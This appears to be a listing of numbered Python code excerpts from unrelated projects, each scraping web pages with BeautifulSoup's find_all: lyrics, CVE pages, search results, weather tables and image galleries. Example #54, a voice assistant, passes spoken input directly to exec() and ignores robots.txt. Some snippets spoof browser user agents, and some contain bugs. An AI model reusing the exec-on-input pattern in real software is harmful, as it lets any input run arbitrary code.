     return True
Example #36
def parse_html():
    try: 
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup

    filename = 'temp.html'
    html = open(filename, "r").read()
    parsed_html = BeautifulSoup(html, "lxml")

    links = parsed_html.find_all("a")

    for link in links:
        print(str(link.text) + " Pattern," + ",https://en.wikipedia.org" + str(link.get("href")) + ",Wikipedia")
Example #37
def scraping(cve):
    parsers = ['html.parser']
    r = requests.get('https://nvd.nist.gov/vuln/detail/' + cve)
    soup = BeautifulSoup(r.content, "lxml")
    i = 0
    critical = ""
    size = len(soup.find_all('p'))

    description = soup.find_all('p')[24].text

    crit = soup.find_all('p')[27].text
    i = 0
    more = []
    for line in crit.splitlines():

        if i == 4:
            critical = line
        i = i + 1

    if critical.startswith("N") == True:
        critical = "N/A"

    return description, critical
Example #38
def genius_scrape_url(url, title):
    proxy = urllib.request.getproxies()
    r = requests.get(url, timeout=10, proxies=proxy)

    try:
        document = BeautifulSoup(r.text, 'html.parser')

        # Genius seems to be returning two types of content
        # One has a 'lyrics' div, the other has Lyrics__Container
        lyrics_div = document.find('div', class_='lyrics')
        if lyrics_div:
            lyrics_paragraphs = []
            [
                lyrics_paragraphs.append(elem.get_text())
                for elem in lyrics_div.find_all('p')
            ]

            lyrics = ''.join(lyrics_paragraphs)

            return LYRICS_TUPLE(lyrics.strip(), url)

        lyrics_containers = document.find_all(
            'div', class_=re.compile('Lyrics__Container*'))
        if lyrics_containers:
            lyrics = ''
            for lyrics_container in lyrics_containers:
                # Genius puts annotations nested with the actual lyrics spans
                # In order to extract the lyrics correctly, need to replace HTML line breaks
                # with \n line breaks
                for br in lyrics_container.find_all('br'):
                    br.replace_with('\n')
                lyrics += lyrics_container.text
            return LYRICS_TUPLE(lyrics, url)

        lyrics_container = document.find(
            'div', class_=re.compile('LyricsPlaceholder__Message*'))
        if lyrics_container:
            # When the song is an instrumental, Genius sometimes puts a LyricsPlaceholder div
            lyrics = '[Instrumental]'
            return LYRICS_TUPLE(lyrics, url)
    except:
        if genius_key == '':
            logger.log(logger.LOG_LEVEL_INFO,
                       SEARCH_ERROR.format(source='Genius', file=title))
        else:
            logger.log(logger.LOG_LEVEL_ERROR,
                       PARSE_ERROR.format(source='Genius', file=title))
        return False

    return False
Example #39
async def g_search_custom(message, client, search):
    loop = asyncio.get_event_loop()
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
    search = search.replace(' ', '+')
    async with aiohttp.get('https://www.google.com/search?q={}&start=1&num=1'.format(search), headers=headers) as gr:
        try: 
            from BeautifulSoup import BeautifulSoup
        except ImportError:
            from bs4 import BeautifulSoup
        html = await gr.text()
        results = []
        parsed_html = BeautifulSoup(html, "html.parser")
        for item in parsed_html.find_all('h3', attrs={'class': 'r'}):
            results.append(str(item.a['href']).replace('/url?q=', '').split('&sa=U&ved=')[0])
    await client.send_message(message.channel, 'Top result for `{}`: '.format(search) + ''.join(results[0]))
Example #40
def get_completions(request):
    completion1 = ""
    completion2 = ""
    completion3 = ""
    if request.method == "POST":
        html = request.POST.get('content')
        to_parse = find_between(html, "<p>---</p>", "<p>---</p>")
        if (to_parse[0] != ""):
            s = BeautifulSoup(to_parse[0], "html.parser")
            to_complete = ''.join(s.find_all(text=True))
            openai.api_key = os.getenv("OPENAI_API_KEY")
            pre_prompt = ''.join([
                "mount everest 8000m above see level\n",
                "lies in India and nepal\n", "###\n",
                "Mount Everest is 8000m above sea level and spans across India and Nepal\n",
                "###\n", "network for large number devices\n",
                "tested with 10\n", "no errors\n", "50%% less power usage\n",
                "###\n",
                "The network architecture was designed to be used for a large number of devices. We tested it with 10 devices at our lab, no errors while encountered. This implementation also reduces power consumption by 50%% relative to the previous solution.\n",
                "###\n", "first switch trial\n",
                "distributions match error data\n",
                "compare frequencies of strategies used on trial 1\n",
                "distribution of stratigies in older children different than 1 year olds and apes",
                "1 year olds and apes similar", "###\n",
                "the first switch trial revealed that distributions match the error data. Comparison of frequencies of strategies adapted on trial 1 showed that distribution of first-choice strategy in older children differed significantly from those of 1-year-olds and apes, which were in turn very similar to each other.\n",
                "###\n"
            ])
            print(pre_prompt)
            test = openai.Completion.create(engine="davinci-instruct-beta",
                                            prompt=pre_prompt + to_complete +
                                            "\n###\n",
                                            max_tokens=400,
                                            temperature=0.3,
                                            stop="###",
                                            n=3)
            print(test)
            print('---------------')
            print(to_parse[1])
            print(to_parse[2])
            completion1 = test['choices'][0]['text']
            completion2 = test['choices'][1]['text']
            completion3 = test['choices'][2]['text']
            return HttpResponse(json.dumps({
                "completion1": completion1,
                "completion2": completion2,
                "completion3": completion3
            }),
                                content_type="application/json")
def parse_junit_results(output):
    try:
        directory = sys.argv[1]
    except:
        print("Error: Enter a valid local repository")
        return -1
    try:
        path = '../{}/target/surefire-reports/'
        path = path.format(directory)
        files = os.listdir(path)
    except IOError:
        print("Error: Configuration file not found or inaccessible.")
        return -1
    try:
        from BeautifulSoup import BeautifulSoup
    except ImportError:
        from bs4 import BeautifulSoup
    body = []
    for file in files:
        if file.startswith('TEST'):
            xml = open(path + file)
            soup = BeautifulSoup(xml, 'xml')
            failureLog = ''
            message = ''
            status = ''
            for tag in soup.find_all('testcase'):
                if tag is not None:
                    name = tag['classname']
                    step = tag['name']
                    if tag.find('failure') is not None:
                        status = 'FAIL'
                        try:
                            failure = tag.find('failure')
                            message = failure['message']
                            failureLog = base64.b64encode(
                                bytes(failure.text, 'utf-8'))
                            failureLog = failureLog.decode('utf-8')
                        except:
                            message = 'None'
                            failureLog = ''
                    elif tag.find('skipped') is not None:
                        status = 'SKIP'
                    else:
                        status = 'PASS'
                    value = create_test_logs_json(name, step, status, message,
                                                  failureLog, output)
                body.append(value)
    return body
Example #42
def parse(folder, inlinks, outlinks):
    """
    Read all .html files in the specified folder. Populate the two
    dictionaries inlinks and outlinks. inlinks maps a url to its set of
    backlinks. outlinks maps a url to its set of forward links.
    """
    filepath = '.\\'+folder+'\\*.html'
    for path in glob.glob(filepath):
        with open(path, 'r') as f:
            html =  f.readlines()
            inlink = f.name.split('\\')[-1] 
            bs = BeautifulSoup(''.join(html))
            for link in bs.find_all('a'):
                outlink = link.get('href')
                outlinks[inlink].add(outlink)
                inlinks[outlink].add(inlink)
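parse() above adds to inlinks[outlink] and outlinks[inlink] without creating those entries first, so the caller presumably passes defaultdict(set) objects. A minimal driver under that assumption (the folder name is a placeholder, not one from the original project):

from collections import defaultdict

inlinks = defaultdict(set)   # url -> set of pages that link to it
outlinks = defaultdict(set)  # url -> set of pages it links to
parse('crawl', inlinks, outlinks)
for url in outlinks:
    print(url, '->', len(outlinks[url]), 'outgoing links')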
 def parse(self, html):
     '''
     Parse the Weibo (microblog) data contained in the given html string
     -----------------------------------------
     html: the given html string
     --------------------------------------
     return: list of blogs
     '''
     bpos = html.find('<!--feed内容-->')
     epos = html.find('<!--翻页-->', bpos)
     bloghtml = html[bpos:epos].replace('\\/', '/') + '</div>'
     soup = BeautifulSoup(bloghtml)
     blogsouplist = soup.find_all('div', class_='WB_cardwrap WB_feed_type S_bg2 ')
     bloglist = []
     for blogsoup in blogsouplist:
         self.init_blog()
         self._parse_blog(blogsoup)
         bloglist.append(self.blog)
     return bloglist
Example #44
def main():
	page = '' 
	try:
		href = 'http://www.google.com.tw/'
		session = requests.Session()
		page = get_page(session, href)
		#print(page)
	except requests.exceptions.HTTPError:
		return None

	soup = BeautifulSoup(page)
	#print(soup.prettify()) 
	# using BeautifulSoup 3
	if soup is None:
		print('soup is none')
	for img in soup.find_all(['img']):
		print(img['src'])
	# /logos/doodles/2014/world-cup-2014-42-4675815216250880-hp.gif 
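get_page() is not included in this listing; given that main() wraps it in a try/except for requests.exceptions.HTTPError, one plausible shape (an assumption, not the original helper) is:

# Hypothetical get_page helper; the real implementation is not shown in the listing.
def get_page(session, href, timeout=10):
    resp = session.get(href, timeout=timeout)
    resp.raise_for_status()  # surfaces HTTPError for main() to catch
    return resp.text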
Example #45
def crawl_page(session, can_url, url, todo, page):
    print ("Crawling " + url)
    page.add_alias(url)
    req = session.get(url)

    print("\t" + req.url)

    soup = BeautifulSoup(req.text, 'html.parser')


    for link in soup.find_all('a'):
        if link.has_attr('href'):
            dest = urljoin(url, link['href'])
            href = urlparse(dest)
            if href.netloc != '' and href.netloc != can_url.netloc: continue
            if href.path == '.': continue

            if dest not in todo:
                todo.add(dest)
    
    page.form_inputs.update(get_form_inputs(soup))
Example #46
def crawl(url):
	page = urllib2.urlopen(url)
	contents = page.read()
	soup = BeautifulSoup(contents)
	print(u'Douban Top 250 movies: rank \ttitle\t rating \tnumber of raters')
	for tag in soup.find_all('div', class_='item'):
		m_order = int(tag.find('em').get_text())
		m_name = tag.a.get_text()
		m_year = tag.span.get_text()
		for y in tag.find_all('em'):
			if y.get_text() != str(m_order):  # m_order is an int, get_text() returns a string
				score =  y.get_text()
		'''m_rating_num =  int(tag.find_all('em').get_text())'''
		la= []
		for n in tag.find_all('span'):
			la.append(n)

		if len(la[4].get_text() ) <= 4:
			m_rating_num = la[5].get_text()
		else:
			m_rating_num = la[4].get_text()
		print("%s %s %s %s %s" % (m_order, m_name, m_year, score, m_rating_num))
def html_to_json(content, indent=None):
    soup = BeautifulSoup(content, "lxml")
    rows = soup.find_all("tr")
    
    headers = {}
    thead = soup.find("thead")
    if thead:
        thead = thead.find_all("th")
        for i in range(len(thead)):
            headers[i] = thead[i].text.strip().lower()
    data = []
    for row in rows:
        cells = row.find_all("td")
        if thead:
            items = {}
            for index in headers:
                items[headers[index]] = cells[index].text
        else:
            items = []
            for index in cells:
                items.append(index.text.strip())
        data.append(items)
    return json.dumps(data, indent=indent)
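A small smoke test of html_to_json on an invented two-column table (with the guard above, the header row containing only <th> cells is skipped):

# Illustrative only; the markup is made up.
sample = ('<table><thead><tr><th>Name</th><th>Qty</th></tr></thead>'
          '<tbody><tr><td>apples</td><td>3</td></tr></tbody></table>')
print(html_to_json(sample, indent=2))
# prints a JSON list with one {"name": "apples", "qty": "3"} object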
def getSubGroups(url, group):
  log.write("-getSubGroups-\n")
  try:
    html = requests.get(url+group.getLink())
    content = BeautifulSoup(html.text, "lxml")
    log.write("->Got "+group.getName()+"'s page content\n")
    #Log file which will contain all twitter ids labeled according to the groups
    subGroup = None
    #Retrieving groups and people listed below these groups
    for div in content.find_all('div', {"class":["size14", "person-box"]}):
      #Subgroup found
      if "size14" in div.attrs['class']:
        if subGroup != None:
          #Adding a subgroup to its respective group
          group.addCollection(subGroup)
        try:
          subGroup = Group()
          subGroup.setLink(div.a['href'])
          subGroup.setName(div.text.encode('utf-8'))
        except Exception, e:
          log.write('error: '+str(e)+'\n')
      #Person found
      if "person-box" in div.attrs['class']:
        divPerson = div.find('div', 'name')
        try:
          person = Person()
          person.setName(divPerson.text.encode('utf-8'))
          person.setLink(divPerson.a['href'])
          #Retrieving this person's twitter id
          get_twitter_screen_name(url, person)
          #Adding a person to its respective subgroup
          subGroup.addCollection(person)
          #Registering this information in the log file
          f.write(group._name+' - '+subGroup._name+' - '+person._name+' - '+person._screen_name+'\n')
        except Exception, e:
          log.write('error: '+str(e)+'\n')
Example #49
def visit(scheme, domain, resource):
    '''
        Visit 'url' with designated 'user_agent'
        return a 'resources' list with unique elements
    '''
    global _non_visited_links
    temporal_resource_list = list()

    if resource.startswith('/'):
        url = "%s://%s%s" % (scheme, domain, resource)
    else:
        url = "%s://%s/%s" % (scheme, domain, resource)

    print("visiting: url: %s" % url)
    request = requests.get(url, headers=user_agent)
    soup = BeautifulSoup(request.text)
    resources = {
        'anchor': (soup.find_all('a'), 'href'),
        'iframe': (soup.find_all('iframe'), 'src'),
        'frame': (soup.find_all('frame'), 'src'),
        'img': (soup.find_all('img'), 'src'),
        'link': (soup.find_all('link'), 'href'),
        'script': (soup.find_all('script'), 'src'),
        'form': (soup.find_all('form'), 'action'),
        }

    for res in resources.values():
        tags, attr = res
        for tag in tags:
            if tag.has_attr(attr):
                temporal_resource_list.append(tag[attr])

    if resource.startswith('/'):
        resource = resource[1:]

    _visited_links.append(resource)
    _non_visited_links.extend(resource_filter(domain, temporal_resource_list))
import sys, os


try:
    from BeautifulSoup import BeautifulSoup
except ImportError:
    from bs4 import BeautifulSoup

import urllib.request, re, csv

html = urllib.request.urlopen("http://snr.unl.edu/lincolnweather/data/monthly-observed-vs-normals.asp")

soup = BeautifulSoup(html, "lxml")
tables = soup.find_all("table")
print(len(tables))
temps = tables[0]
with open("mon_temps_lnk.csv", "w", newline="") as csvfile:
    writer = csv.writer(csvfile)
    for row in temps.find_all("tr"):
        data = []
        for cell in row.find_all("td"):
            data.append(cell.text)
        print(data)
        writer.writerow(data)
		dir_location = "{}/{}".format(settings.cache_directory, user.id);

		if not os.path.exists(dir_location):
			os.makedirs(dir_location);

		if num == 0:
			print("scraping {}...".format(user.permalink));

		num += 1;

		with urllib.request.urlopen(tracks_page) as response:
			html = response.read();

			soup = BeautifulSoup(html, "html.parser");

			for article in soup.find_all(class_='audible'):
				track = article.find('a', attrs={"itemprop": "url"}, href=True);
				timestamp = article.find('time');

				file_location = "{}/{}.json".format(dir_location, track['href'].split("/")[-1:][0]);

				if os.path.exists(file_location):
					continue;

				info = {
					"id": -1,
					"title": track.text,
					"duration": -1,
					"timestamp": timestamp.text,
					"description": "API request was rejected, unable to scrape for description.",
					"permalink": "http://soundcloud.com{}".format(track['href']),
def parser_core(word_extract) :
   
  parse_soup = BeautifulSoup(word_extract)
  
  text_file.write("Main Word:")
  text_file.write("\n")
  for word in parse_soup.find_all("b"):  
    text_file.write(word.get_text())
    text_file.write("\n")
  
  text_file.write('\n')
  
  text_file.write("Part of Speech:")
  text_file.write("\n")
  for word in parse_soup.find_all("i"):  
    text_file.write(word.get_text())
    text_file.write("\n")
    
  text_file.write("\n")  
  
  text_file.write("Definition:")
  text_file.write("\n")
  definition = re.search(re.compile('<td>(?!<).*</td>'), str(word_extract)).group()
  Definition_Soup = BeautifulSoup(definition)
  for word in Definition_Soup.find_all("td"):  
    text_file.write(word.get_text())
    text_file.write("\n")
    
  text_file.write("\n")  
  
  text_file.write("Synonyms:")
  text_file.write("\n")
  
  check_syn = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(word_extract))

  if check_syn is None:
    text_file.write("None")
    text_file.write("\n")
  else:
    syn_ant = check_syn.group()
    synonyms_soup = BeautifulSoup(syn_ant)
    for word in synonyms_soup.find_all("span"):
      parser_synonyms = word.get_text()
      parser_synonyms = re.sub(r'^\n', '', str(parser_synonyms))
      parser_synonyms = re.sub(r',[ \t]', ',\n', str(parser_synonyms))
      parser_synonyms = re.sub(',', '', str(parser_synonyms))
      text_file.write(parser_synonyms)
      text_file.write("\n")
  
  text_file.write("\n")
  
  
  text_file.write("Antonyms:") 
  text_file.write("\n")
  # remove the synonyms cell from the extract so the next <td><span> cell found below is the antonyms cell
  syn_ant = re.sub(re.compile('<td><span>.*?</span></td>', re.DOTALL), '', str(word_extract), 1)
  
  check_ant = re.search(re.compile('<td><span>.*?</span></td>', re.DOTALL), str(syn_ant))

  if check_ant is None:
    text_file.write("None")
    text_file.write("\n")
    text_file.write("\n")
  else:
    syn_ant = check_ant.group()
    antonyms_soup = BeautifulSoup(syn_ant)
    for word in antonyms_soup.find_all("span"):
      parser_antonyms = word.get_text()
      parser_antonyms = re.sub(r'^\n', '', str(parser_antonyms))
      parser_antonyms = re.sub(r',[ \t]', ',\n', str(parser_antonyms))
      parser_antonyms = re.sub(',', '', str(parser_antonyms))
      text_file.write(parser_antonyms)
      text_file.write("\n")
      text_file.write("\n")
Example #53
0
# find_all() requires BeautifulSoup 4; the legacy BeautifulSoup 3 package only provides findAll()
from bs4 import BeautifulSoup
import urllib2

webpage = urllib2.urlopen('http://en.wikipedia.org/wiki/Main_Page')
soup = BeautifulSoup(webpage)
for anchor in soup.find_all('a'):
    print(anchor.get('href', '/'))
Example #54
0
def main(input=input, *args):
    response = "hi"
    choose = False
    choice = "go"
    YorN = None
    words = [""]
    chunk = 0
    link = 0
    global droid, prompt

    #### MAIN LOOP:
    while response != "":

        ################### input and convert to list of words
        print "input1=" + input, "response1=" + response  # , "choice="+choice

        while input == "" or input == "nospeech" or input is None:
            input = droid.recognizeSpeech().result
            if not response:
                print "noresponse"
                input = droid.recognizeSpeech().result  # exec(channel)
            if choose:
                print "choose"
                prompt = choice
                choice = droid.recognizeSpeech().result
                input = "choose"  # exec(channel)
            if not choose and response:
                input = droid.recognizeSpeech().result  # prompt = response+'>'; exec(channel)

            if input is None:
                time.sleep(7)
                input = ""
                # print 2 #exec(channel)
            else:
                print "input2=", input

            # exec('print 2')
            # if input is None:
            # prompt = response+'>'
            # input = raw_input('>')
        try:
            words = input.split(" ")
        except:
            pass

        #### set context(s)
        '''if context: 
			phrase2 = raw_input(str(context)+ ' is ')
			context['action'] = phrase2; context = None
			print dctn[df[0]]['action']
			#confirm = raw_input('confirm?')
			#if confirm == 'y':  context = confirm; context = None; input ="okay"'''

        ################### direct commands
        if input == "quit":
            response = ""
        if input == "save":
            PBcreateBranch()
            break
        if input == "dctn":
            response = str(dctn)
            print response, dctn
            continue
        if input == "hi":
            response = "hello"
        if prompt == "anything else? (yes/no)>":
            if YorN == "yes":
                pass
            if YorN == "no":
                break

            ################### keyword based commands

            ########## definitions
        if " is " in input and not "what is " in input and not words[0] == "is":
            df = input.split(" is ")  # definition
            try:
                dctn[df[0]] = df[1]
            except:
                print "error, not entered"  # dctn[df[0]]=[df[1]]
            if df[1] == "action":
                dctn[df[0]] = {"action": ""}
                response = "how " + df[0] + "?"
                context = dctn[df[0]]
            response = "okay"
            # continue

        if " is not " in input:
            split = input.split(" is not ")  # remove definition
            try:
                dctn[split[0]].remove(split[1])
            except:
                pass

            ######## question
        if "?" in input:
            input = input.strip("?")
            if "what is" in input:
                q = input.split("what is ")
                # print dctn[q[1]]
                if q[1] in dctn:
                    response = dctn[q[1]]
                else:
                    try:
                        input = "search " + q[1]
                    except:
                        response = q[1] + " is not known"

                    ######## google
        if "search" in input:
            query = input.replace("search ", "")
            print "searching " + query
            from pygoogle import pygoogle

            g = pygoogle(query)
            g.pages = 1
            results = g.__search__()
            # print str(results)
            choose = True
            response = results[link]["content"]
            # response = repr(response)
            response = response.encode("ascii", "ignore")

            ##################################################################################################################################
        if choose:
            print "chooseTrue"
            if choice == "next":
                link = link + 1
                print "link=", link
                response = results[link]["content"]
                # response = repr(response)
                response = response.encode("ascii", "ignore")
            if choice == "go":
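                # 'url' is assumed to be set elsewhere to the address of the chosen search result; it is not defined in this excerpt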
                br = mechanize.Browser()
                br.set_handle_robots(False)
                br.addheaders = [
                    (
                        "User-agent",
                        "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1",
                    )
                ]
                page = br.open(url)
                response = page.read()
                soup = BeautifulSoup(response, "html.parser")
                # paras=soup.p #findAll('p', text=True)
                VALID_TAGS = ["p", "span"]  # , 'ul', 'li', 'br']'div',
                paras = [
                    i.text.encode("ascii", "ignore") for i in soup.find_all(VALID_TAGS)
                ]  ################## removes <p>s
                paras = filter(None, paras)
                paras = [i.replace("\n", ".").replace("\r", ".") for i in paras]
                paras = [
                    i.replace("(", "parens").replace(")", "parens").replace("[", "bracket").replace("]", "bracket")
                    for i in paras
                ]

                input = raw_input("pause")

                ######## actions
        if "e" in input:
            exec1 = input.split("e ")  # exec
            try:
                exec (exec1[1])
                continue
            except Exception, e:
                print str(e)

        if "do" in input:  # action
            try:
                exec (dctn[words[1]]["action"] + ' "' + str("".join(words[2:99])) + '"')
                continue
            except Exception, e:
                print str(e)
Example #55
0
			#f=open('/home/sunying/hello-jane/weathercrawler/f.txt','w')
			#f.write(self.html)
			#f.close()
			self.page.close()
			return self.soup
				
crawler= Crawler(url)
csoup=crawler.getHtml(url)
#f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w')
csoup=str(csoup)
#print csoup
#f.close()
#soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
soup = BeautifulSoup(csoup)
#soup= soup.prettify() 
csoup=soup.find("div",id="tqyDiv")
csoup=csoup.find("div",id="gdDiv")
csoup=csoup.find_all("div",class_="hzDqDivClass")
#,id="gdDiv")
#print soup
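# the <div id="dqN"> elements appear to hold two-character Chinese place names; capture just the name
# (assumes the HTML has been decoded to unicode so the \u4e00-\u9fa5 range matches)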
res=re.compile(r'<div id=\"dq\d\" onclick=\".+\">([\u4e00-\u9fa5]{2})</div>')
result=res.findall(str(csoup))
print result
#print len(result)
#f=open('/home/sunying/hello-jane/weathercrawler/re.csv','w')
with open('/home/sunying/hello-jane/weathercrawler/hzqx.csv', 'wb') as csvfile:
    #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
    spamwriter = csv.writer(csvfile, dialect='excel')
    i=0
    while i < len(result):
        spamwriter.writerow(result[i])
        i += 1  # without this increment the loop never terminates
Example #56
0
        #f.close()
        self.page.close()
        return self.soup
month=1
while month<=12:            
    crawler= Crawler(year,month,city)
    #print crawler.url_back()
    csoup=crawler.getHtml(crawler.url_back())
    #f=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html','w')
    csoup=str(csoup)
    #print csoup
    #f.close()
        #soup=open('/home/sunying/hello-jane/weathercrawler/sucess/soup.html')
    soup = BeautifulSoup(csoup)
    #soup= soup.prettify() 
    csoup=soup.find_all("table")
    #print soup
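    # each table row is expected to begin with a bold day number followed by ten daily weather readings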
    res=re.compile(r'<td><strong>(\d|\d{2})</strong></td>'+r'<td>(-?\d+\.\d|-?\d{2}|-|\d|-?\d|-?\d+\.\d{2}|-?\d+\.\d{2})</td>'*10)
    result=res.findall(str(csoup))
    result=list(result)
    print result
    #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a')
    #f.write(str(result))
    #f.close()
    #print len(result)
    #
    #f=open('/home/sunying/hello-jane/weathercrawler/hzqx/try.csv','a')
    with open('/home/sunying/hello-jane/weathercrawler/hzqx/hzweather.csv','a') as csvfile:
        #spamwriter = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)
        spamwriter = csv.writer(csvfile, dialect='excel')
        spamwriter.writerow(['%4d-%02d'%(2012,month)])
Example #57
0
# coding:utf-8
import os

import requests
from bs4 import BeautifulSoup  # find_all() requires bs4, not the legacy BeautifulSoup 3 package

# expanduser() turns "~" into a real home-directory path; open() does not expand it by itself
DownPath = os.path.expanduser("~/material/spider/www.meizitu.com/pic")

head = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'}
TimeOut = 5
PhotoName = 0
c = '.jpeg'
PWD = DownPath
for x in range(1, 4):
    site = "http://www.meizitu.com/a/qingchun_3_%d.html" % x
    Page = requests.session().get(site, headers=head, timeout=TimeOut)
    Coding = (Page.encoding)
    Content = Page.content  #.decode(Coding).encode('utf-8')
    ContentSoup = BeautifulSoup(Content)
    jpg = ContentSoup.find_all('img', {'class': 'scrollLoading'})
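    # the thumbnails appear to be lazy-loaded: the real image URL is read from the data-original attribute below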
    for photo in jpg:
        PhotoAdd = photo.get('data-original')
        PhotoName += 1
        Name = (str(PhotoName) + c)
        r = requests.get(PhotoAdd, stream=True)
        with open(os.path.join(PWD, Name), 'wb') as fd:
            for chunk in r.iter_content():
                fd.write(chunk)
print ("You have down %d photos" % PhotoName)
Example #58
0
<td headers="pltab1time">19:50:01</td>
<td class="bold" headers="pltab1artist">Jason Derulo</td>
<td headers="pltab1title">In my head</td></tr>
<tr class="wsOdd"><td headers="pltab1time">19:45:30</td>
<td class="bold" headers="pltab1artist">Lena</td>
<td headers="pltab1title">Neon (Lonely People)</td>
</tr></tbody></table></div>
"""

soup = BeautifulSoup(html_doc2)


#print(soup.prettify())
#print (soup.find_all('td'))
#print (soup.find_all("td", "headers"))

# match <td> cells whose headers attribute names either the artist or the title column
print (soup.find_all(headers=re.compile("pltab1artist|pltab1title")))

#print (soup.title.string)

"""
for headers in soup.find_all('td'):
    print (soup.find(headers="pltab1artist"))
    print (soup.find(headers="pltab1title"))
"""

#for headers in soup.find_all('td'):
#    print(headers.get('td'))

#headers="pltab1artist"
Example #59
0
        if imgs[1]:    
            ensure_dir(loc)    
        total_page_div = soup.find('span', class_='red')    
        if (hasattr(total_page_div, 'text')):    
            total_page = int(total_page_div.text)    
        else:    
            total_page = 1            
        for i in range(2, total_page + 1):    
            imgs[i] = get_img_from_url(url + "&pn=" + str(i))            
        for i in imgs:    
            for j in imgs[i]:    
                links.add(j.get('src'))            
        thread.start_new(down_links_to_folder, (links, dirname))            
        return links   
    except Exception, e:    
        print 'error..', e
        
baidu_base_url = 'http://tieba.baidu.com'
baidu_homepage = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=%E5%A7%90%E8%84%B1")
soup = BeautifulSoup(baidu_homepage.content)
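# anchors with class "j_th_tit" are assumed to be the thread-title links on the Tieba listing page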
titles = soup.find_all('a', target="_blank", class_="j_th_tit")
urls = {}

for i, title in enumerate(titles):
    urls[i] = baidu_base_url + title.get('href')
    print urls[i], title.text.encode('gbk', 'ignore')

for i in urls:
    thread.start_new(get_tieba_img_url_from_url, (urls[i] + '?see_lz=1',))

#time.sleep(100000)